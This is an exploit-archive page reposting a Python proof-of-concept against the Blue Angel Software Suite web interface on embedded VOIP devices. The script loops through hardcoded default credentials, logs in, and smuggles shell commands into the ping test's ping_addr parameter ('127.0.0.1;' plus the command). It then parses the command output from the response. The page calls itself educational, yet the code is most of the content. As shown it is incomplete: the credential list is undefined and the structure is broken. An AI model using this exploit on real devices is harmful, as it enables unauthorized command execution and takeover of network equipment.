Blue angel software suite command execution Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-05-03 |
Type : remote |
Platform : linux
This exploit / vulnerability Blue angel software suite command execution is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Blue Angel Software Suite - Authenticated Command Execution
# Google Dork: N/A
# Date: 02/05/2019
# Exploit Author: Paolo Serracino
# Vendor Homepage: http://www.5vtechnologies.com
# Software Link: N/A
# Version: All
# Tested on: Embedded Linux OS
# CVE : N/A
# Description: Blue Angel Software Suite, an application that runs on embedded devices for VOIP/SIP services is vulnerable to an authenticated
# command execution in ping command. All default accounts can be used to login and achieve command execution, including the guest one.
# Moreover there's another account, defined in the local file device.dat, that provides an apparently "backdoor" account.
# A list of these accounts is hardcoded in the script.
#/usr/bin/python
import sys
import requests
def check_sw(target,port):
res = requests.get(target + ':' + port)
if '/cgi-bin/webctrl.cgi?action=index_page' in res.text:
return True
else:
print "[-] DOES NOT LOOK LIKE THE PAGE WE'RE LOOKING FOR"
return False
for i in range(len(creds_common)):
postdata=[('action','login_authentication'),
('redirect_action','sysinfo_page'),
('login_username',creds_common[i][0]),
('login_password',creds_common[i][1]),
('B1','Login')
]
res = requests.post(target + ':' + port + '/cgi-bin/webctrl.cgi',data=postdata)
if 'Set-Cookie' in res.headers:
cookie = res.headers.get('Set-Cookie')
print '[+] LOGGED IN WITH CREDENTIALS ' + str(creds_common[i][0] + ' : ' + creds_common[i][1])
execute_cmd(target,port,cookie,command)
return True
def execute_cmd(target,port,cookie,cmd):
print '[+] EXECUTING COMMAND'
new_headers = ({'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
'Referer': target,
'Cookie': cookie
})
res = requests.get(target + ':' + port + '/cgi-bin/webctrl.cgi?action=pingtest_update&ping_addr=127.0.0.1;' + cmd + '&B1=PING',headers=new_headers)
res_lines = res.text.splitlines()
result = []
copy = False
for line in res_lines:
if 'round-trip min/avg/max' in line:
copy = True
elif '</pre></body></html>' in line:
copy = False
elif copy == True:
result.append(line)